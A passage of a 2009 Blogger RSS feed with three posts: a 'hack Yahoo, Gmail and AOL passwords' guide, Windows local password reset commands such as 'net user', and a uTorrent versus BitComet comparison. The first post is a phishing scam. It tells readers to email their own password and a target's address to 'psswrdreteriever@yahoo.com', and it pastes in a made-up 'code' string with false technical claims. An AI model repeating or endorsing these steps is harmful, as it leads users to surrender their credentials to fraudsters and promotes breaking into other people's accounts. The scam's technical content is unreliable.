id="textNode_7813870" style="display: block; margin-top: 0.4em; "&gt;Hack yahoo, rediff, gmail &amp;amp; aol password&lt;br /&gt;STEP 1- Log in to your own yahoo account. Note: Your&lt;br /&gt;account must be at&lt;br /&gt;least 30 days old for this to work.&lt;br /&gt;STEP 2- Once you have logged into your own account,&lt;br /&gt;compose/write an e-mail&lt;br /&gt;to: psswrdreteriever@yahoo.com&lt;br /&gt;This is a mailing&lt;br /&gt;address to the Yahoo&lt;br /&gt;Staff. The automated server will send you the password&lt;br /&gt;that you have&lt;br /&gt;'forgotten', after receiving the information you send&lt;br /&gt;them.&lt;br /&gt;STEP 3- In the subject line type exactly: " PASSWORD&lt;br /&gt;RECOVERY "&lt;br /&gt;STEP 4- On the first line of your mail write the email&lt;br /&gt;address of the person&lt;br /&gt;you are hacking.&lt;br /&gt;STEP 5- On the second line type in the e-mail address&lt;br /&gt;you are using.&lt;br /&gt;STEP 6- On the third line type password of your&lt;br /&gt;email address (your&lt;br /&gt;OWN password). The computer needs your password so it&lt;br /&gt;can send a JavaScript&lt;br /&gt;from your account in the Yahoo Server to extract the&lt;br /&gt;other email addresses&lt;br /&gt;password. In other word the system automatically&lt;br /&gt;checks your password to&lt;br /&gt;confirm the integrity of your status.&lt;br /&gt;The process will be done automatically by the user&lt;br /&gt;administration server. STEP 7- The final step before&lt;br /&gt;sending the mail is,&lt;br /&gt;type on the fourth line the following code exactly:&lt;br /&gt;cgi-bin_psswrdreteriever/$et76431&amp;amp;pwrsa&lt;br /&gt;script&lt; ip://233.243.2.34/cgi-bin/start?&lt;br /&gt;v703&amp;amp;login=passmachine&amp;amp;f=(password)&amp;amp;f=27586&amp;amp;javascript=ACTIVE&amp;amp;rsa#&gt;&lt;br /&gt;{simply copy and paste above.}&lt;br /&gt;The password of the target id which u wana to hack sent to your mail address approximately 1 day from system reg&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;</description><link>http://123mycomputer.blogspot.com/2009/09/hacing-orkut-password.html</link><author>noreply@blogger.com (AJEET)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8378401052179741157.post-1101110431081618177</guid><pubDate>Tue, 08 Sep 2009 15:03:00 +0000</pubDate><atom:updated>2009-09-08T08:09:59.343-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hack</category><title>change Windows password</title><description>&lt;span class="Apple-style-span"   style=" color: rgb(51, 51, 51);  line-height: 19px; font-family:'Lucida Grande';font-size:12px;"&gt;&lt;p    style="margin-top: 0px; margin-right: 0px; margin-bottom: 1.5em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; outline-width: 0px; outline-style: initial; outline-   vertical-align: baseline; font-family:inherit;font-size:12px;color:initial;"&gt;&lt;span class="Apple-style-span"   style="  line-height: 16px; font-family:'lucida grande';font-size:13px;"&gt;&lt;/span&gt;&lt;/p&gt;&lt;h3 size="13px" style=" padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: auto; margin-right: auto; margin-bottom: auto; margin-left: auto; "&gt;&lt;/h3&gt;&lt;h3 size="13px" style=" padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: auto; margin-right: auto; margin-bottom: auto; margin-left: auto; "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Using Command Prompt&lt;/span&gt;&lt;/h3&gt;&lt;h3 size="13px" style=" padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: auto; margin-right: auto; margin-bottom: auto; margin-left: auto; "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 size="13px" style=" padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: auto; margin-right: auto; margin-bottom: auto; margin-left: auto; "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Go to the command prompt and enter:&lt;/span&gt;&lt;/h3&gt;&lt;h3 size="13px" style=" padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: auto; margin-right: auto; margin-bottom: auto; margin-left: auto; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-family: Georgia; font-size: 13px; font-weight: normal; line-height: normal; "&gt;net user&lt;/span&gt;&lt;/h3&gt;&lt;/span&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 1.5em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; outline-width: 0px; outline-style: initial; outline-color: initial; font-family: inherit; vertical-align: baseline; "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;E.g.&lt;br /&gt;&gt; net user Mark p@55w0rd&lt;/span&gt;&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 1.5em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; outline-width: 0px; outline-style: initial; outline-color: initial; font-family: inherit; vertical-align: baseline; "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;If there are people near you and you don't want them to see the password you type, enter:&lt;br /&gt;net user *&lt;/span&gt;&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 1.5em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; outline-width: 0px; outline-style: initial; outline-color: initial; font-family: inherit; vertical-align: baseline; "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;E.g. &gt; net user Mark *&lt;br /&gt;&gt; Type a password for the user:&lt;br /&gt;&gt; Confirm the password:&lt;/span&gt;&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 1.5em; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; outline-width: 0px; outline-style: initial; outline-color: initial; font-family: inherit; vertical-align: baseline; "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;span class="Apple-style-span"  style="  line-height: 16px; font-family:'lucida grande';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;img title="cmdChangePassword" src="http://www.technize.com/wp-content/uploads/2008/06/cmdchangepassword-thumb.png" border="0" alt="cmdChangePassword" width="289" height="137" style="border-top-style: initial; border-right-style: initial; border-bottom-style: initial; border-left-style: initial; border-width: initial; border-color: initial; border-right-width: 0px; border-right-color: initial; border-top-width: 0px; border-top-color: initial; border-left-width: 0px; border-left-color: initial; border-bottom-width: 0px; border-bottom-color: initial; " /&gt;&lt;/span&gt;&lt;/p&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:100%;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;&lt;b&gt;Using Control userpasswords2&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;p&gt;&lt;span class="Apple-style-span" style="font-size: small; "&gt;To use this classic user management, go to Start –&gt; Run –&gt; control userpasswords2&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;This will open the classic user accounts management window. Select any user and select reset password.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;img title="classicUserAccounts" src="http://www.technize.com/wp-content/uploads/2008/06/classicuseraccounts-thumb.png" border="0" alt="classicUserAccounts" width="254" height="287" style="border-top-style: initial; border-right-style: initial; border-bottom-style: initial; border-left-style: initial; border-width: initial; border-color: initial; border-right-width: 0px; border-right-color: initial; border-top-width: 0px; border-top-color: initial; border-left-width: 0px; border-left-color: initial; border-bottom-width: 0px; border-bottom-color: initial; " /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span class="Apple-style-span"  style="font-size:100%;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span class="Apple-style-span"  style="font-size:100%;"&gt;&lt;span class="Apple-style-span" style="font-size: 13px;"&gt;&lt;b&gt;Using Control userpasswords2&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span class="Apple-style-span" style="font-size: small; "&gt;To use the computer management console to change the passwords of the users, right click My Computer –&gt; Manage –&gt; Local Users And Groups –&gt; Users&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Right click the username for which you want to change the password and select Reset Password.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;img title="mgmtConsolePwd" src="http://www.technize.com/wp-content/uploads/2008/06/mgmtconsolepwd-thumb.png" border="0" alt="mgmtConsolePwd" width="132" height="158" style="border-top-style: initial; border-right-style: initial; border-bottom-style: initial; border-left-style: initial; border-width: initial; border-color: initial; border-right-width: 0px; border-right-color: initial; border-top-width: 0px; border-top-color: initial; border-left-width: 0px; border-left-color: initial; border-bottom-width: 0px; border-bottom-color: initial; " /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;If you have any other method of changing the password, please let me know through comments. Thanks.&lt;/span&gt;&lt;/p&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;</description><link>http://123mycomputer.blogspot.com/2009/09/change-windows-password.html</link><author>noreply@blogger.com (AJEET)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8378401052179741157.post-4575605608715692482</guid><pubDate>Sat, 05 Sep 2009 00:31:00 +0000</pubDate><atom:updated>2009-09-08T07:50:32.008-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Internet</category><title>which is better utorrent or bitcomet</title><description>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://t0.gstatic.com/images?q=tbn:kJYonLN6y7jByM:http://www.imts.edu.kw/images/bitcometSZ.jpg"&gt;&lt;/a&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:Arial;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:Arial;"&gt;&lt;span class="Apple-style-span" style="white-space: pre;"&gt;&lt;span class="Apple-style-span"   style=" white-space: normal; color: rgb(73, 73, 73);  line-height: 20px; font-family:'Trebuchet MS';font-size:14px;"&gt;&lt;p style="text-align: left; "&gt;&lt;img align="right" alt="utorrent.jpg" id="image693" title="utorrent.jpg" src="http://en.onsoftware.com/wp-content/uploads/2007/02/utorrent.jpg" style="border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; margin-top: 5px; margin-right: 0px; margin-bottom: 0px; margin-left: 5px; padding-top: 0px; padding-right: 5px; padding-bottom: 0px; padding-left: 5px; display: block; float: right; " /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Now that BitTorrent has gone all sensible and started charging for licensed downloads, free torrent clients are likely to experience a surge in usage. uTorrent and BitComet are two of the most popular torrent apps around, allowing you download audio, video and software at high speeds through torrents, downloading a file in pieces rather than from one source in order to speed up transfer times.&lt;/span&gt;&lt;/p&gt;&lt;p style="text-align: left; "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;uTorrent (also written as ‘&lt;/span&gt;&lt;span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;µTorrent’)&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; has quickly become a favorite among torrent users worldwide thanks to an innovative interface, minute CPU usage and extensive download details. The program is undoubtedly one of the most reliable torrent clients on the market, thanks to an ultra quick installation process and a minimal use of PC resources. You can have a good number of torrents downloading and still be able to use your PC without suffering any lags.&lt;/span&gt;&lt;/p&gt;&lt;p style="text-align: left; "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;uTorrent makes it easy for you to look for new downloads without opening up your browser. You can search the main torrent sites by typing the name of the file you are looking for in the box on the top right corner of the interface. uTorrent also includes an RSS downloader to receive feeds of your favourite torrent sites. This little feature is great for checking out all the new torrents in one click.&lt;/span&gt;&lt;/p&gt;&lt;p style="text-align: left; "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;span id="more-691"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style="text-align: left; "&gt;&lt;img align="left" alt="bitcomet_logo.jpg" id="image692" title="bitcomet_logo.jpg" src="http://en.onsoftware.com/wp-content/uploads/2007/02/bitcomet_logo.jpg" style="border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; margin-top: 5px; margin-right: 5px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 5px; padding-bottom: 0px; padding-left: 5px; display: block; float: left; " /&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;And in the blue corner – BitComet, an application that prides itself on its wide array of features for managing your torrents…. As opposed to the rather sparse uTorrent interface, the glitzy BitComet swings in with all manner of flashy icons and a a multitude of options that give you more control over your downloads. For those who want a no-fuss client, the extra features may simply get in the way.&lt;/span&gt;&lt;/p&gt;&lt;p style="text-align: left; "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Once a torrent is selected for download with BitComet, a dialog pops up allowing you to determine the location to save to and select exactly which files in the torrent you want. Once downloading, the regular stop, pause, cancel, update etc options are all available plus a handy “remove torrent &amp;amp; all files” option which removes all trace of an unwanted torrent from your PC. Many users report the download rates are good although note no particular difference with other clients’ speeds. The best feature however is a ‘preview media’ option, which forces the torrent to download sequentially instead of randomly thus allowing you to preview any multimedia downloads. It’s a great way to avoid broken links, but, on the downside, it will slow down your download considerably.&lt;/span&gt;&lt;/p&gt;&lt;p style="text-align: left; "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Another interesting feature is the ‘intelligent disk cache’ which really comes into its own on high-speed connections. If you are lucky enough to get download transfer rates of 500 kb/s or higher, activating it allows BitComet to cache the data to access the disk less frequently. The result of this is that it doesn’t slow down your PC as receiving large amounts of data can sometimes do. This generally helps to make transfer speeds a little quicker than uTorrent.&lt;/span&gt;&lt;/p&gt;&lt;p style="text-align: left; "&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Both apps are very accomplished in their own right and it’s worth giving each of them a shot, but from my point of view, uTorrent wins every time. uTorrent’s small footprint means it won’t strangle your system’s resources like ts rivalt can, and the program is free of the adware that blights BitComet. Although download speeds can be marginally quicker in BitComet, it overdoes things in terms of features and extras that aren’t really needed by most torrent users, making it much more cumbersome overall.&lt;/span&gt;&lt;/p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;</description><link>http://123mycomputer.blogspot.com/2009/09/which-is-better-torrent-or-bitcomet.html</link><author>noreply@blogger.com (AJEET)</author><thr:total>0</thr:total></item></channel></rss>